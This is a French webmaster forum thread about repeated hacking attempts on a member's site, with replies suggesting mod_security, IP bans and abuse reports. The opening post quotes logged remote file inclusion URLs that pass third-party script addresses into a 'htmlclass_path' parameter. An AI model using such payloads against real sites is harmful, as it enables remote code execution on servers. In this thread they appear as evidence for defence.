Tentatives de hack de mon site

ibost · PR5 Inscrit le: 15 Avr 2007 Messages: 502

Bonjour.

Cela fait maintenant plus d'une semaine qu'une personne ou un robot essaie de hacker mon site. Je n'arrête pas de recevoir des notifications d'erreurs 404. L'URL recherché est toujours de la même forme :

Exemples :

1) [RACINE DE MON SITE]/webmaster-phphtml/phphtml.php?htmlclass_path=http://www.geocities.com/dinarisma/new.gif???

2) [RACINE DE MON SITE]/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt?

Savez-vous comment je peux arrêter ces [$^ù$^ù#"&] ???

Merci.

hawk88 · PR2 Inscrit le: 05 Jan 2007 Messages: 265

Bonjour,

il fait plusieurs attaques à la seconde ?

Comme tu es en dédié il y a le mod_evasive et le mod security qui peuvetn être utile

ibost · PR5 Inscrit le: 15 Avr 2007 Messages: 502

Je sais pas ce qu'il essaie de faire mais je pense qu'il croit que j'utilise Joomla...

SeO · Administrateur - Site Admin Inscrit le: 15 Mar 2006 Messages: 3821

Il y a à priori peu de chances que ce genre d'attaque passent, sauf de faire tomber le serveur momentanément par surcharge et encore.

Par précaution, tu peux tout de même essayer de voir quels ip sont utilisées pour ces urls, et s'il n'y en a pas trop, les bannir quelques temps ...

Et si tu es motivé => hack / spam report au fournisseur de l'ip, tu peux trouver les contact par le Whois => http://www.dnsstuff.com/

Un bon mail avec les logs concernés, ça peut avoir quelques conséquences sur l'auteur en fonction du propriétaire de l'ip Wink

ibost · PR5 Inscrit le: 15 Avr 2007 Messages: 502

Hm.... intéressant ! Cool

rapha-35 · Inscrit le: 16 Mai 2008 Messages: 21

Salut, je ne m'y connais pas trop, mais il exploite une soit disant faille de ton site pour te faire executer ce fichier :http://www.motociclismo.pt/images/Equipa/jpg.txt

Je ne parviens pas a savoir ce qu'il peut faire

SeO · Administrateur - Site Admin Inscrit le: 15 Mar 2006 Messages: 3821

mm, c'est une collection de petites fonctions pour hacker le serveur, dans le cas ou il y aurai des droits d'exécution dans le dossier.
Si tu as ça, c'est qu'a priori quelqu'un a réussi à le mettre là, si c'est pas toi, il est temps de bien vérifier ton site et ta db, histoire de voir si ce fichier a été utilisé ou pas.
Faudrait aussi restreindre les accès le plus possible au dossier dans le quel ce fichier est apparu.

ibost · PR5 Inscrit le: 15 Avr 2007 Messages: 502

Je ne connais pas ce fichier ni ce site... d'ailleurs il n'utilise pas seulement ce seul site, ils passent par plein d'autres sites !

SeO · Administrateur - Site Admin Inscrit le: 15 Mar 2006 Messages: 3821

ibost · PR5 Inscrit le: 15 Avr 2007 Messages: 502

Je parle de sites hébergés sous Geocities ou des sites en noms de domaines propres. Enfin bref je vais essayer de bloquer leur IP.

Merci !